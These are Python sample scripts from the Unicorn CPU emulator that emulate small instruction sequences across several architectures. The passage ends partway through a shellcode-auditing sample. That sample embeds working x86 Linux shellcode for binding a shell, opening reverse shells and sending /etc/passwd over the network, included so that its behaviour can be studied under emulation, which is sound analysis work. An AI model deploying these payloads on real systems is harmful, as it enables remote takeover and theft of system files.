# callback for tracing instructions
def hook_code(uc, address, size, user_data):
    print(">>> Tracing instruction at 0x%x, instruction size = 0x%x" %(address, size))


# Test ARM
def test_arm():
    print("Emulate ARM code")
    try:
        # Initialize emulator in ARM mode
        mu = Uc(UC_ARCH_ARM, UC_MODE_ARM)

        # map 2MB memory for this emulation
        mu.mem_map(ADDRESS, 2 * 1024 * 1024)

        # write machine code to be emulated to memory
        mu.mem_write(ADDRESS, ARM_CODE)

        # initialize machine registers
        mu.reg_write(UC_ARM_REG_R0, 0x1234)
        mu.reg_write(UC_ARM_REG_R2, 0x6789)
        mu.reg_write(UC_ARM_REG_R3, 0x3333)
        mu.reg_write(UC_ARM_REG_APSR, 0xFFFFFFFF)  # all application flags turned on

        # tracing all basic blocks with customized callback
        mu.hook_add(UC_HOOK_BLOCK, hook_block)

        # tracing one instruction at ADDRESS with customized callback
        mu.hook_add(UC_HOOK_CODE, hook_code, begin=ADDRESS, end=ADDRESS)

        # emulate machine code in infinite time
        mu.emu_start(ADDRESS, ADDRESS + len(ARM_CODE))

        # now print out some registers
        print(">>> Emulation done. Below is the CPU context")

        r0 = mu.reg_read(UC_ARM_REG_R0)
        r1 = mu.reg_read(UC_ARM_REG_R1)
        print(">>> R0 = 0x%x" %r0)
        print(">>> R1 = 0x%x" %r1)

    except UcError as e:
        print("ERROR: %s" % e)


def test_thumb():
    print("Emulate THUMB code")
    try:
        # Initialize emulator in thumb mode
        mu = Uc(UC_ARCH_ARM, UC_MODE_THUMB)

        # map 2MB memory for this emulation
        mu.mem_map(ADDRESS, 2 * 1024 * 1024)

        # write machine code to be emulated to memory
        mu.mem_write(ADDRESS, THUMB_CODE)

        # initialize machine registers
        mu.reg_write(UC_ARM_REG_SP, 0x1234)

        # tracing all basic blocks with customized callback
        mu.hook_add(UC_HOOK_BLOCK, hook_block)

        # tracing all instructions with customized callback
        mu.hook_add(UC_HOOK_CODE, hook_code)

        # emulate machine code in infinite time
        # Note we start at ADDRESS | 1 to indicate THUMB mode.
        mu.emu_start(ADDRESS | 1, ADDRESS + len(THUMB_CODE))

        # now print out some registers
        print(">>> Emulation done. Below is the CPU context")

        sp = mu.reg_read(UC_ARM_REG_SP)
        print(">>> SP = 0x%x" %sp)

    except UcError as e:
        print("ERROR: %s" % e)


def test_read_sctlr():
    print("Read SCTLR")
    try:
        # Initialize emulator in ARM mode
        mu = Uc(UC_ARCH_ARM, UC_MODE_ARM)

        # Read SCTLR
        # cp = 15
        # is64 = 0
        # sec = 0
        # crn = 1
        # crm = 0
        # opc1 = 0
        # opc2 = 0
        val = mu.reg_read(UC_ARM_REG_CP_REG, (15, 0, 0, 1, 0, 0, 0))
        print(">>> SCTLR = 0x%x" % val)

    except UcError as e:
        print("ERROR: %s" % e)


if __name__ == '__main__':
    test_arm()
    print("=" * 26)
    test_thumb()
    print("=" * 26)
    test_read_sctlr()
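test_read_sctlr above selects a coprocessor register by passing a (cp, is64, sec, crn, crm, opc1, opc2) tuple to reg_read. Writing goes through the same selector with the new value appended as the trailing tuple element; the following is a sketch under that assumption, and the bit chosen is purely illustrative:

```python
from unicorn import Uc, UC_ARCH_ARM, UC_MODE_ARM
from unicorn.arm_const import UC_ARM_REG_CP_REG

mu = Uc(UC_ARCH_ARM, UC_MODE_ARM)

# Same selector as test_read_sctlr: cp15, crn=1, crm=0, opc1=0, opc2=0 -> SCTLR
sctlr = mu.reg_read(UC_ARM_REG_CP_REG, (15, 0, 0, 1, 0, 0, 0))

# Set the A bit (alignment checking, bit 1); the value rides along as the
# last element of the tuple.
mu.reg_write(UC_ARM_REG_CP_REG, (15, 0, 0, 1, 0, 0, 0, sctlr | (1 << 1)))
```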
unicorn-2.1.1/bindings/python/sample_arm64.py

#!/usr/bin/env python
# Sample code for ARM64 of Unicorn. Nguyen Anh Quynh <aquynh@gmail.com>
# Python sample ported by Loi Anh Tuan <loianhtuan@gmail.com>

from __future__ import print_function
from unicorn import *
from unicorn.arm64_const import *

# code to be emulated
ARM64_CODE = b"\xab\x05\x00\xb8\xaf\x05\x40\x38"  # str x11, [x13]; ldrb x15, [x13]

# MSR code
ARM64_MRS_CODE = b"\x62\xd0\x3b\xd5"  # mrs x2, tpidrro_el0

# memory address where emulation starts
ADDRESS = 0x10000


# callback for tracing basic blocks
def hook_block(uc, address, size, user_data):
    print(">>> Tracing basic block at 0x%x, block size = 0x%x" %(address, size))


# callback for tracing instructions
def hook_code(uc, address, size, user_data):
    print(">>> Tracing instruction at 0x%x, instruction size = 0x%x" %(address, size))


# Test ARM64
def test_arm64():
    print("Emulate ARM64 code")
    try:
        # Initialize emulator in ARM mode
        mu = Uc(UC_ARCH_ARM64, UC_MODE_ARM)

        # map 2MB memory for this emulation
        mu.mem_map(ADDRESS, 2 * 1024 * 1024)

        # write machine code to be emulated to memory
        mu.mem_write(ADDRESS, ARM64_CODE)

        # initialize machine registers
        mu.reg_write(UC_ARM64_REG_X11, 0x12345678)
        mu.reg_write(UC_ARM64_REG_X13, 0x10008)
        mu.reg_write(UC_ARM64_REG_X15, 0x33)

        # tracing all basic blocks with customized callback
        mu.hook_add(UC_HOOK_BLOCK, hook_block)

        # tracing one instruction with customized callback
        mu.hook_add(UC_HOOK_CODE, hook_code, begin=ADDRESS, end=ADDRESS)

        # emulate machine code in infinite time
        mu.emu_start(ADDRESS, ADDRESS + len(ARM64_CODE))

        # now print out some registers
        print(">>> Emulation done. Below is the CPU context")
        print(">>> As little endian, X15 should be 0x78:")

        x11 = mu.reg_read(UC_ARM64_REG_X11)
        x13 = mu.reg_read(UC_ARM64_REG_X13)
        x15 = mu.reg_read(UC_ARM64_REG_X15)
        print(">>> X15 = 0x%x" %x15)

    except UcError as e:
        print("ERROR: %s" % e)


def test_arm64_read_sctlr():
    print("Read SCTLR_EL1")
    try:
        # Initialize emulator in ARM mode
        mu = Uc(UC_ARCH_ARM64, UC_MODE_ARM)

        # Read SCTLR_EL1
        # crn = 1;
        # crm = 0;
        # op0 = 3;
        # op1 = 0;
        # op2 = 0;
        val = mu.reg_read(UC_ARM64_REG_CP_REG, (1, 0, 3, 0, 0))
        print(">>> SCTLR_EL1 = 0x%x" % val)

    except UcError as e:
        print("ERROR: %s" % e)


def test_arm64_hook_mrs():
    def _hook_mrs(uc, reg, cp_reg, _):
        print(f">>> Hook MRS instruction: reg = 0x{reg:x}(UC_ARM64_REG_X2) cp_reg = {cp_reg}")
        uc.reg_write(reg, 0x114514)
        print(">>> Write 0x114514 to X2")

        # Skip MRS instruction
        return True

    print("Test hook MRS instruction")
    try:
        # Initialize emulator in ARM mode
        mu = Uc(UC_ARCH_ARM64, UC_MODE_ARM)

        # Map an area for code
        mu.mem_map(0x1000, 0x1000)

        # Write code
        mu.mem_write(0x1000, ARM64_MRS_CODE)

        # Hook MRS instruction
        mu.hook_add(UC_HOOK_INSN, _hook_mrs, None, 1, 0, UC_ARM64_INS_MRS)

        # Start emulation
        mu.emu_start(0x1000, 0x1000 + len(ARM64_MRS_CODE))

        print(f">>> X2 = {mu.reg_read(UC_ARM64_REG_X2):x}")

    except UcError as e:
        print("ERROR: %s" % e)


if __name__ == '__main__':
    test_arm64()
    print("=" * 26)
    test_arm64_read_sctlr()
    print("=" * 26)
    test_arm64_hook_mrs()
unicorn-2.1.1/bindings/python/sample_arm64eb.py

#!/usr/bin/env python
# Sample code for ARM64 of Unicorn. Nguyen Anh Quynh <aquynh@gmail.com>
# Python sample ported by Loi Anh Tuan <loianhtuan@gmail.com>
# AARCH64 Python sample ported by zhangwm <rustydaar@gmail.com>

from __future__ import print_function
from unicorn import *
from unicorn.arm64_const import *

# code to be emulated
ARM64_CODE = b"\xab\x05\x00\xb8\xaf\x05\x40\x38"  # str x11, [x13]; ldrb x15, [x13]

# memory address where emulation starts
ADDRESS = 0x10000


# callback for tracing basic blocks
def hook_block(uc, address, size, user_data):
    print(">>> Tracing basic block at 0x%x, block size = 0x%x" %(address, size))


# callback for tracing instructions
def hook_code(uc, address, size, user_data):
    print(">>> Tracing instruction at 0x%x, instruction size = 0x%x" %(address, size))


# Test ARM64
def test_arm64():
    print("Emulate ARM64 Big-Endian code")
    try:
        # Initialize emulator in ARM mode
        mu = Uc(UC_ARCH_ARM64, UC_MODE_ARM | UC_MODE_BIG_ENDIAN)

        # map 2MB memory for this emulation
        mu.mem_map(ADDRESS, 2 * 1024 * 1024)

        # write machine code to be emulated to memory
        mu.mem_write(ADDRESS, ARM64_CODE)

        # initialize machine registers
        mu.reg_write(UC_ARM64_REG_X11, 0x12345678)
        mu.reg_write(UC_ARM64_REG_X13, 0x10008)
        mu.reg_write(UC_ARM64_REG_X15, 0x33)

        # tracing all basic blocks with customized callback
        mu.hook_add(UC_HOOK_BLOCK, hook_block)

        # tracing all instructions with customized callback
        mu.hook_add(UC_HOOK_CODE, hook_code, begin=ADDRESS, end=ADDRESS)

        # emulate machine code in infinite time
        mu.emu_start(ADDRESS, ADDRESS + len(ARM64_CODE))

        # now print out some registers
        print(">>> Emulation done. Below is the CPU context")
        print(">>> As big endian, X15 should be 0x12:")

        x11 = mu.reg_read(UC_ARM64_REG_X11)
        x13 = mu.reg_read(UC_ARM64_REG_X13)
        x15 = mu.reg_read(UC_ARM64_REG_X15)
        print(">>> X15 = 0x%x" %x15)

    except UcError as e:
        print("ERROR: %s" % e)


if __name__ == '__main__':
    test_arm64()
unicorn-2.1.1/bindings/python/sample_armeb.py

#!/usr/bin/env python
# Sample code for ARM big endian of Unicorn. zhangwm <rustydaar@gmail.com>

from __future__ import print_function
from unicorn import *
from unicorn.arm_const import *

# code to be emulated
ARM_CODE = b"\xe3\xa0\x00\x37\xe0\x42\x10\x03"  # mov r0, #0x37; sub r1, r2, r3
THUMB_CODE = b"\xb0\x83"  # sub sp, #0xc

# memory address where emulation starts
ADDRESS = 0x10000


# callback for tracing basic blocks
def hook_block(uc, address, size, user_data):
    print(">>> Tracing basic block at 0x%x, block size = 0x%x" %(address, size))


# callback for tracing instructions
def hook_code(uc, address, size, user_data):
    print(">>> Tracing instruction at 0x%x, instruction size = 0x%x" %(address, size))


# Test ARM
def test_arm():
    print("Emulate ARM Big-Endian code")
    try:
        # Initialize emulator in ARM mode
        mu = Uc(UC_ARCH_ARM, UC_MODE_ARM | UC_MODE_BIG_ENDIAN)

        # map 2MB memory for this emulation
        mu.mem_map(ADDRESS, 2 * 1024 * 1024)

        # write machine code to be emulated to memory
        mu.mem_write(ADDRESS, ARM_CODE)

        # initialize machine registers
        mu.reg_write(UC_ARM_REG_R0, 0x1234)
        mu.reg_write(UC_ARM_REG_R2, 0x6789)
        mu.reg_write(UC_ARM_REG_R3, 0x3333)
        mu.reg_write(UC_ARM_REG_APSR, 0xFFFFFFFF)  # all application flags turned on

        # tracing all basic blocks with customized callback
        mu.hook_add(UC_HOOK_BLOCK, hook_block)

        # tracing one instruction at ADDRESS with customized callback
        mu.hook_add(UC_HOOK_CODE, hook_code, begin=ADDRESS, end=ADDRESS)

        # emulate machine code in infinite time
        mu.emu_start(ADDRESS, ADDRESS + len(ARM_CODE))

        # now print out some registers
        print(">>> Emulation done. Below is the CPU context")

        r0 = mu.reg_read(UC_ARM_REG_R0)
        r1 = mu.reg_read(UC_ARM_REG_R1)
        print(">>> R0 = 0x%x" %r0)
        print(">>> R1 = 0x%x" %r1)

    except UcError as e:
        print("ERROR: %s" % e)


def test_thumb():
    print("Emulate THUMB code")
    try:
        # Initialize emulator in thumb mode
        mu = Uc(UC_ARCH_ARM, UC_MODE_THUMB | UC_MODE_BIG_ENDIAN)

        # map 2MB memory for this emulation
        mu.mem_map(ADDRESS, 2 * 1024 * 1024)

        # write machine code to be emulated to memory
        mu.mem_write(ADDRESS, THUMB_CODE)

        # initialize machine registers
        mu.reg_write(UC_ARM_REG_SP, 0x1234)

        # tracing all basic blocks with customized callback
        mu.hook_add(UC_HOOK_BLOCK, hook_block)

        # tracing all instructions with customized callback
        mu.hook_add(UC_HOOK_CODE, hook_code)

        # emulate machine code in infinite time
        # Note we start at ADDRESS | 1 to indicate THUMB mode.
        mu.emu_start(ADDRESS | 1, ADDRESS + len(THUMB_CODE))

        # now print out some registers
        print(">>> Emulation done. Below is the CPU context")

        sp = mu.reg_read(UC_ARM_REG_SP)
        print(">>> SP = 0x%x" %sp)

    except UcError as e:
        print("ERROR: %s" % e)


if __name__ == '__main__':
    test_arm()
    print("=" * 26)
    test_thumb()
unicorn-2.1.1/bindings/python/sample_ctl.py

#!/usr/bin/env python
# Sample code for Unicorn.
# By Lazymio(@wtdcode), 2021

from unicorn import *
from unicorn.x86_const import *
from datetime import datetime


def test_uc_ctl_read():
    uc = Uc(UC_ARCH_X86, UC_MODE_32)

    print("Reading some properties by uc_ctl.")

    arch = uc.ctl_get_arch()
    mode = uc.ctl_get_mode()
    page_size = uc.ctl_get_page_size()
    timeout = uc.ctl_get_timeout()

    print(f">>> arch={arch} mode={mode} page size={page_size} timeout={timeout}")


def time_emulation(uc, start, end):
    n = datetime.now()
    uc.emu_start(start, end)
    return (datetime.now() - n).total_seconds() * 1e6


def test_uc_ctl_tb_cache():
    # Initialize emulator in X86-32bit mode
    uc = Uc(UC_ARCH_X86, UC_MODE_32)
    addr = 0x10000

    # Fill the code buffer with NOP.
    code = b"\x90" * 8 * 512

    print("Controlling the TB cache in a finer granularity by uc_ctl.")

    uc.mem_map(addr, 0x10000)

    # Write our code to the memory.
    uc.mem_write(addr, code)

    # Do emulation without any cache.
    standard = time_emulation(uc, addr, addr + len(code))

    # Now we request cache for all TBs.
    for i in range(8):
        tb = uc.ctl_request_cache(addr + i * 512)
        print(f">>> TB is cached at {hex(tb.pc)} which has {tb.icount} instructions with {tb.size} bytes")

    # Do emulation with all TB cached.
    cached = time_emulation(uc, addr, addr + len(code))

    # Now we clear cache for all TBs.
    for i in range(8):
        uc.ctl_remove_cache(addr + i * 512, addr + i * 512 + 1)

    evicted = time_emulation(uc, addr, addr + len(code))

    print(f">>> Run time: First time {standard}, Cached: {cached}, Cache evicted: {evicted}")


def trace_new_edge(uc, cur, prev, data):
    print(f">>> Getting a new edge from {hex(prev.pc + prev.size - 1)} to {hex(cur.pc)}")


def trace_tcg_sub(uc, address, arg1, arg2, size, data):
    print(f">>> Got a tcg sub opcode at {hex(address)} with args: {arg1} and {arg2}")


def test_uc_ctl_exits():
    uc = Uc(UC_ARCH_X86, UC_MODE_32)
    addr = 0x1000

    # cmp eax, 0;
    # jg lb;
    # inc eax;
    # nop;
    # lb:
    # inc ebx;
    # nop;
    code = b"\x83\xf8\x00\x7f\x02\x40\x90\x43\x90"
    exits = [addr + 6, addr + 8]

    print("Using multiple exits by uc_ctl")

    uc.mem_map(addr, 0x1000)

    # Write our code to the memory.
    uc.mem_write(addr, code)

    # We trace if any new edge is generated.
    uc.hook_add(UC_HOOK_EDGE_GENERATED, trace_new_edge)

    # Trace cmp instruction.
    uc.hook_add(UC_HOOK_TCG_OPCODE, trace_tcg_sub, aux1=UC_TCG_OP_SUB, aux2=UC_TCG_OP_FLAG_CMP)

    uc.ctl_exits_enabled(True)
    uc.ctl_set_exits(exits)

    # This should stop at ADDRESS + 6 and increase eax, even though we don't provide an exit.
    uc.emu_start(addr, 0)

    eax = uc.reg_read(UC_X86_REG_EAX)
    ebx = uc.reg_read(UC_X86_REG_EBX)
    print(f">>> eax = {hex(eax)} and ebx = {hex(ebx)} after the first emulation")

    # This should stop at ADDRESS + 8, even though we don't provide an exit.
    uc.emu_start(addr, 0)

    eax = uc.reg_read(UC_X86_REG_EAX)
    ebx = uc.reg_read(UC_X86_REG_EBX)
    print(f">>> eax = {hex(eax)} and ebx = {hex(ebx)} after the second emulation")


if __name__ == "__main__":
    test_uc_ctl_read()
    print("="*32)
    test_uc_ctl_tb_cache()
    print("="*32)
    test_uc_ctl_exits()
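The TB-cache portion of sample_ctl.py requests one cached translation block per 512-byte stride before timing the run. The same pattern generalizes to a small pre-warm helper built only from the ctl calls shown above; the helper name and stride constant here are ours, not Unicorn API:

```python
from unicorn import Uc, UC_ARCH_X86, UC_MODE_32

TB_STRIDE = 512  # granularity used by sample_ctl.py; tune for your code layout

def prewarm_tb_cache(uc, base, size, stride=TB_STRIDE):
    # Ask Unicorn to pre-translate a block at every stride boundary,
    # so the first emu_start doesn't pay the translation cost.
    for off in range(0, size, stride):
        uc.ctl_request_cache(base + off)

uc = Uc(UC_ARCH_X86, UC_MODE_32)
uc.mem_map(0x10000, 0x10000)
uc.mem_write(0x10000, b"\x90" * 4096)  # NOP sled
prewarm_tb_cache(uc, 0x10000, 4096)
uc.emu_start(0x10000, 0x10000 + 4096)
```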
unicorn-2.1.1/bindings/python/sample_m68k.py

#!/usr/bin/env python
# Sample code for M68K of Unicorn. Nguyen Anh Quynh <aquynh@gmail.com>
# Python sample ported by Loi Anh Tuan <loianhtuan@gmail.com>

from __future__ import print_function
from unicorn import *
from unicorn.m68k_const import *

# code to be emulated
M68K_CODE = b"\x76\xed"  # movq #-19, %d3

# memory address where emulation starts
ADDRESS = 0x10000


# callback for tracing basic blocks
def hook_block(uc, address, size, user_data):
    print(">>> Tracing basic block at 0x%x, block size = 0x%x" %(address, size))


# callback for tracing instructions
def hook_code(uc, address, size, user_data):
    print(">>> Tracing instruction at 0x%x, instruction size = 0x%x" %(address, size))


# Test M68K
def test_m68k():
    print("Emulate M68K code")
    try:
        # Initialize emulator in M68K (big-endian) mode
        mu = Uc(UC_ARCH_M68K, UC_MODE_BIG_ENDIAN)

        # map 2MB memory for this emulation
        mu.mem_map(ADDRESS, 2 * 1024 * 1024)

        # write machine code to be emulated to memory
        mu.mem_write(ADDRESS, M68K_CODE)

        # initialize machine registers
        mu.reg_write(UC_M68K_REG_D3, 0x1234)

        # tracing all basic blocks with customized callback
        mu.hook_add(UC_HOOK_BLOCK, hook_block)

        # tracing all instructions with customized callback
        mu.hook_add(UC_HOOK_CODE, hook_code)

        # emulate machine code in infinite time
        mu.emu_start(ADDRESS, ADDRESS + len(M68K_CODE))

        # now print out some registers
        print(">>> Emulation done. Below is the CPU context")

        a0 = mu.reg_read(UC_M68K_REG_A0)
        a1 = mu.reg_read(UC_M68K_REG_A1)
        a2 = mu.reg_read(UC_M68K_REG_A2)
        a3 = mu.reg_read(UC_M68K_REG_A3)
        a4 = mu.reg_read(UC_M68K_REG_A4)
        a5 = mu.reg_read(UC_M68K_REG_A5)
        a6 = mu.reg_read(UC_M68K_REG_A6)
        a7 = mu.reg_read(UC_M68K_REG_A7)
        d0 = mu.reg_read(UC_M68K_REG_D0)
        d1 = mu.reg_read(UC_M68K_REG_D1)
        d2 = mu.reg_read(UC_M68K_REG_D2)
        d3 = mu.reg_read(UC_M68K_REG_D3)
        d4 = mu.reg_read(UC_M68K_REG_D4)
        d5 = mu.reg_read(UC_M68K_REG_D5)
        d6 = mu.reg_read(UC_M68K_REG_D6)
        d7 = mu.reg_read(UC_M68K_REG_D7)
        pc = mu.reg_read(UC_M68K_REG_PC)
        sr = mu.reg_read(UC_M68K_REG_SR)

        print(">>> A0 = 0x%x\t\t>>> D0 = 0x%x" % (a0, d0))
        print(">>> A1 = 0x%x\t\t>>> D1 = 0x%x" % (a1, d1))
        print(">>> A2 = 0x%x\t\t>>> D2 = 0x%x" % (a2, d2))
        print(">>> A3 = 0x%x\t\t>>> D3 = 0x%x" % (a3, d3))
        print(">>> A4 = 0x%x\t\t>>> D4 = 0x%x" % (a4, d4))
        print(">>> A5 = 0x%x\t\t>>> D5 = 0x%x" % (a5, d5))
        print(">>> A6 = 0x%x\t\t>>> D6 = 0x%x" % (a6, d6))
        print(">>> A7 = 0x%x\t\t>>> D7 = 0x%x" % (a7, d7))
        print(">>> PC = 0x%x" % pc)
        print(">>> SR = 0x%x" % sr)

    except UcError as e:
        print("ERROR: %s" % e)


if __name__ == '__main__':
    test_m68k()
unicorn-2.1.1/bindings/python/sample_mips.py

#!/usr/bin/env python
# Sample code for MIPS of Unicorn. Nguyen Anh Quynh <aquynh@gmail.com>
# Python sample ported by Loi Anh Tuan <loianhtuan@gmail.com>

from __future__ import print_function
from unicorn import *
from unicorn.mips_const import *

# code to be emulated
MIPS_CODE_EB = b"\x34\x21\x34\x56"  # ori $at, $at, 0x3456;
MIPS_CODE_EL = b"\x56\x34\x21\x34"  # ori $at, $at, 0x3456;

# memory address where emulation starts
ADDRESS = 0x10000


# callback for tracing basic blocks
def hook_block(uc, address, size, user_data):
    print(">>> Tracing basic block at 0x%x, block size = 0x%x" %(address, size))


# callback for tracing instructions
def hook_code(uc, address, size, user_data):
    print(">>> Tracing instruction at 0x%x, instruction size = 0x%x" %(address, size))


# Test MIPS EB
def test_mips_eb():
    print("Emulate MIPS code (big-endian)")
    try:
        # Initialize emulator in MIPS32 + EB mode
        mu = Uc(UC_ARCH_MIPS, UC_MODE_MIPS32 + UC_MODE_BIG_ENDIAN)

        # map 2MB memory for this emulation
        mu.mem_map(ADDRESS, 2 * 1024 * 1024)

        # write machine code to be emulated to memory
        mu.mem_write(ADDRESS, MIPS_CODE_EB)

        # initialize machine registers
        mu.reg_write(UC_MIPS_REG_1, 0x6789)

        # tracing all basic blocks with customized callback
        mu.hook_add(UC_HOOK_BLOCK, hook_block)

        # tracing all instructions with customized callback
        mu.hook_add(UC_HOOK_CODE, hook_code)

        # emulate machine code in infinite time
        mu.emu_start(ADDRESS, ADDRESS + len(MIPS_CODE_EB))

        # now print out some registers
        print(">>> Emulation done. Below is the CPU context")

        r1 = mu.reg_read(UC_MIPS_REG_1)
        print(">>> R1 = 0x%x" %r1)

    except UcError as e:
        print("ERROR: %s" % e)


# Test MIPS EL
def test_mips_el():
    print("Emulate MIPS code (little-endian)")
    try:
        # Initialize emulator in MIPS32 + EL mode
        mu = Uc(UC_ARCH_MIPS, UC_MODE_MIPS32 + UC_MODE_LITTLE_ENDIAN)

        # map 2MB memory for this emulation
        mu.mem_map(ADDRESS, 2 * 1024 * 1024)

        # write machine code to be emulated to memory
        mu.mem_write(ADDRESS, MIPS_CODE_EL)

        # initialize machine registers
        mu.reg_write(UC_MIPS_REG_1, 0x6789)

        # tracing all basic blocks with customized callback
        mu.hook_add(UC_HOOK_BLOCK, hook_block)

        # tracing all instructions with customized callback
        mu.hook_add(UC_HOOK_CODE, hook_code)

        # emulate machine code in infinite time
        mu.emu_start(ADDRESS, ADDRESS + len(MIPS_CODE_EL))

        # now print out some registers
        print(">>> Emulation done. Below is the CPU context")

        r1 = mu.reg_read(UC_MIPS_REG_1)
        print(">>> R1 = 0x%x" %r1)

    except UcError as e:
        print("ERROR: %s" % e)


if __name__ == '__main__':
    test_mips_eb()
    print("=" * 27)
    test_mips_el()
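MIPS_CODE_EB and MIPS_CODE_EL above encode the same ori instruction; for a fixed-width 32-bit ISA, the little-endian bytes are simply the big-endian words byte-swapped, which struct can do for code of any length. A convenience sketch, not repository code:

```python
import struct

MIPS_CODE_EB = b"\x34\x21\x34\x56"  # ori $at, $at, 0x3456 (big-endian)

def swap_words(code):
    # Reinterpret big-endian 32-bit words as little-endian ones.
    n = len(code) // 4
    return struct.pack("<%dI" % n, *struct.unpack(">%dI" % n, code))

assert swap_words(MIPS_CODE_EB) == b"\x56\x34\x21\x34"  # == MIPS_CODE_EL
```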
Below is the CPU context") r1 = mu.reg_read(UC_MIPS_REG_1) print(">>> R1 = 0x%x" %r1) except UcError as e: print("ERROR: %s" % e) # Test MIPS EL def test_mips_el(): print("Emulate MIPS code (little-endian)") try: # Initialize emulator in MIPS32 + EL mode mu = Uc(UC_ARCH_MIPS, UC_MODE_MIPS32 + UC_MODE_LITTLE_ENDIAN) # map 2MB memory for this emulation mu.mem_map(ADDRESS, 2 * 1024 * 1024) # write machine code to be emulated to memory mu.mem_write(ADDRESS, MIPS_CODE_EL) # initialize machine registers mu.reg_write(UC_MIPS_REG_1, 0x6789) # tracing all basic blocks with customized callback mu.hook_add(UC_HOOK_BLOCK, hook_block) # tracing all instructions with customized callback mu.hook_add(UC_HOOK_CODE, hook_code) # emulate machine code in infinite time mu.emu_start(ADDRESS, ADDRESS + len(MIPS_CODE_EL)) # now print out some registers print(">>> Emulation done. Below is the CPU context") r1 = mu.reg_read(UC_MIPS_REG_1) print(">>> R1 = 0x%x" %r1) except UcError as e: print("ERROR: %s" % e) if __name__ == '__main__': test_mips_eb() print("=" * 27) test_mips_el() �������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/bindings/python/sample_network_auditing.py��������������������������������������������0000775�0000000�0000000�00000030123�14675241067�0023614�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#!/usr/bin/env python # Unicorn sample for auditing network connection and file handling in shellcode. 
unicorn-2.1.1/bindings/python/sample_network_auditing.py

#!/usr/bin/env python
# Unicorn sample for auditing network connection and file handling in shellcode.
# Nguyen Tan Cong <shenlongbk@gmail.com>

from __future__ import print_function
from unicorn import *
from unicorn.x86_const import *
import struct
import uuid

SIZE_REG = 4
SOCKETCALL_MAX_ARGS = 3

SOCKET_TYPES = {
    1: "SOCK_STREAM",
    2: "SOCK_DGRAM",
    3: "SOCK_RAW",
    4: "SOCK_RDM",
    5: "SOCK_SEQPACKET",
    10: "SOCK_PACKET"
}

ADDR_FAMILY = {
    0: "AF_UNSPEC",
    1: "AF_UNIX",
    2: "AF_INET",
    3: "AF_AX25",
    4: "AF_IPX",
    5: "AF_APPLETALK",
    6: "AF_NETROM",
    7: "AF_BRIDGE",
    8: "AF_AAL5",
    9: "AF_X25",
    10: "AF_INET6",
    12: "AF_MAX"
}

# http://shell-storm.org/shellcode/files/shellcode-861.php
X86_SEND_ETCPASSWD = b"\x6a\x66\x58\x31\xdb\x43\x31\xd2\x52\x6a\x01\x6a\x02\x89\xe1\xcd\x80\x89\xc6\x6a\x66\x58\x43\x68\x7f\x01\x01\x01\x66\x68\x30\x39\x66\x53\x89\xe1\x6a\x10\x51\x56\x89\xe1\x43\xcd\x80\x89\xc6\x6a\x01\x59\xb0\x3f\xcd\x80\xeb\x27\x6a\x05\x58\x5b\x31\xc9\xcd\x80\x89\xc3\xb0\x03\x89\xe7\x89\xf9\x31\xd2\xb6\xff\xb2\xff\xcd\x80\x89\xc2\x6a\x04\x58\xb3\x01\xcd\x80\x6a\x01\x58\x43\xcd\x80\xe8\xd4\xff\xff\xff\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64"
# http://shell-storm.org/shellcode/files/shellcode-882.php
X86_BIND_TCP = b"\x6a\x66\x58\x6a\x01\x5b\x31\xf6\x56\x53\x6a\x02\x89\xe1\xcd\x80\x5f\x97\x93\xb0\x66\x56\x66\x68\x05\x39\x66\x53\x89\xe1\x6a\x10\x51\x57\x89\xe1\xcd\x80\xb0\x66\xb3\x04\x56\x57\x89\xe1\xcd\x80\xb0\x66\x43\x56\x56\x57\x89\xe1\xcd\x80\x59\x59\xb1\x02\x93\xb0\x3f\xcd\x80\x49\x79\xf9\xb0\x0b\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x41\x89\xca\xcd\x80"
# http://shell-storm.org/shellcode/files/shellcode-883.php
X86_REVERSE_TCP = b"\x6a\x66\x58\x6a\x01\x5b\x31\xd2\x52\x53\x6a\x02\x89\xe1\xcd\x80\x92\xb0\x66\x68\x7f\x01\x01\x01\x66\x68\x05\x39\x43\x66\x53\x89\xe1\x6a\x10\x51\x52\x89\xe1\x43\xcd\x80\x6a\x02\x59\x87\xda\xb0\x3f\xcd\x80\x49\x79\xf9\xb0\x0b\x41\x89\xca\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80"
# http://shell-storm.org/shellcode/files/shellcode-849.php
X86_REVERSE_TCP_2 = b"\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xb0\x66\xb3\x01\x51\x6a\x06\x6a\x01\x6a\x02\x89\xe1\xcd\x80\x89\xc6\xb0\x66\x31\xdb\xb3\x02\x68\xc0\xa8\x01\x0a\x66\x68\x7a\x69\x66\x53\xfe\xc3\x89\xe1\x6a\x10\x51\x56\x89\xe1\xcd\x80\x31\xc9\xb1\x03\xfe\xc9\xb0\x3f\xcd\x80\x75\xf8\x31\xc0\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\x52\x89\xe2\xb0\x0b\xcd\x80"

# memory address where emulation starts
ADDRESS = 0x1000000

# supported classes
class IdGenerator:
    def __init__(self):
        self.__next_id = 3  # exclude stdin, stdout, stderr

    def next(self):
        next_id = self.__next_id
        self.__next_id += 1
        return next_id

class LogChain:
    def __init__(self):
        self.__chains = {}
        self.__linking_fds = {}

    def clean(self):
        self.__chains = {}
        self.__linking_fds = {}

    def create_chain(self, my_id):
        if not my_id in self.__chains:
            self.__chains[my_id] = []
        else:
            print("LogChain: id %d already exists" % my_id)

    def add_log(self, id, msg):
        fd = self.get_original_fd(id)

        if fd is not None:
            self.__chains[fd].append(msg)
        else:
            print("LogChain: id %d doesn't exist" % id)

    def link_fd(self, from_fd, to_fd):
        if not to_fd in self.__linking_fds:
            self.__linking_fds[to_fd] = []

        self.__linking_fds[to_fd].append(from_fd)

    def get_original_fd(self, fd):
        if fd in self.__chains:
            return fd

        for orig_fd, links in self.__linking_fds.items():
            if fd in links:
                return orig_fd

        return None

    def print_report(self):
        print("""
----------------
| START REPORT |
----------------
""")
        for my_id, logs in self.__chains.items():
            print("---- START FD(%d) ----" % my_id)
            print("\n".join(logs))
            print("---- END FD(%d) ----" % my_id)
        print("""
--------------
| END REPORT |
--------------
""")
# end supported classes

# utilities
def bin_to_ipv4(ip):
    return "%d.%d.%d.%d" % (
        (ip & 0xff000000) >> 24,
